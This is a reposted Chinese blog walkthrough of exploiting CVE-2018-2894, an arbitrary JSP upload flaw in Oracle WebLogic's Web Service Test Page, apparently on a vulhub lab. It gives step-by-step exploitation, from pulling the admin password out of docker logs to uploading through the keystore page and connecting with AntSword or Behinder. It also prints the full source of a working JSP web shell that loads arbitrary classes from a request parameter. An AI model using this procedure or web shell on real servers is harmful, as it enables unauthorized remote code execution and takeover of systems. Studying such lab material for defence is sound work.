文章详情

短信预约-IT技能 免费直播动态提醒

请输入下面的图形验证码

提交验证

短信预约提醒成功

任意文件上传漏洞(CVE-2018-2894)

2023-09-24 12:03

关注

漏洞描述

Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限。Oracle 7月更新中,修复了Weblogic Web Service Test Page中一处任意文件上传漏洞,Web Service Test Page 在 ‘生产模式’ 下默认不开启,所以该漏洞有一定限制,漏洞存在页面在/ws_utc/config.do。

漏洞影响版本

weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。

IP地址  http://192.168.xxx.xxx:7001/console    //进入后台系统

用户账号密码获取

vulhub靶场默认账户是weblogic   密码查看一下logs就能找到了

在kali上执行  docker-compose logs | grep password

环境准备

进入高级配置

 

在此处一定要进行勾选启用web服务器测试页,勾选后下拉的最下方进行保存配置

路径: http://192.168.17.130:7001/ws_utc/config.do

当前的工作目录路径,配置完成后进行保存

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

但在此处是有坑的如果这里的配置这里最后有css,那么上传文件后,你的访问链接应该是

路径:http://localhost:7001/ws_utc/css/config/keystore/1637485345393_shell.jsp

如果没有添加/css 那么上传文件后你的链接应该是

路径:http://localhost:7001/ws_utc/config/keystore/1637485345393_shell.jsp

   安全->添加->浏览

 上传成功之后,查看返回的数据包,其中有时间戳

可以通过查看源代码的方式或者使用Burp抓包进行获取

 获取权限

获取权限的路径   http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名]

我们可以使用蚁剑或者冰蝎进行连接来获取权限

http://192.168.17.130:7001/ws_utc/css/config/keystore/1666276503565_shell.jsp

shell.jsp 文件 (jsp一句话木马)

【连接密码】: passwd

<%!    class U extends ClassLoader {        U(ClassLoader c) {            super(c);        }        public Class g(byte[] b) {            return super.defineClass(b, 0, b.length);        }    }     public byte[] base64Decode(String str) throws Exception {        try {            Class clazz = Class.forName("sun.misc.BASE64Decoder");            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);        } catch (Exception e) {            Class clazz = Class.forName("java.util.Base64");            Object decoder = clazz.getMethod("getDecoder").invoke(null);            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);        }    }%><%    String cls = request.getParameter("passwd");    if (cls != null) {        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);    }%>

来源地址:https://blog.csdn.net/m0_64118193/article/details/127435433

阅读原文内容投诉

免责声明:

① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。

② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

软考中级精品资料免费领

  • 历年真题答案解析
  • 备考技巧名师总结
  • 高频考点精准押题
  • 2024年上半年信息系统项目管理师第二批次真题及答案解析(完整版)

    难度     813人已做
    查看
  • 【考后总结】2024年5月26日信息系统项目管理师第2批次考情分析

    难度     354人已做
    查看
  • 【考后总结】2024年5月25日信息系统项目管理师第1批次考情分析

    难度     318人已做
    查看
  • 2024年上半年软考高项第一、二批次真题考点汇总(完整版)

    难度     435人已做
    查看
  • 2024年上半年系统架构设计师考试综合知识真题

    难度     224人已做
    查看

相关文章

发现更多好内容

猜你喜欢

AI推送时光机
位置:首页-资讯-后端开发
咦!没有更多了?去看看其它编程学习网 内容吧
首页课程
资料下载
问答资讯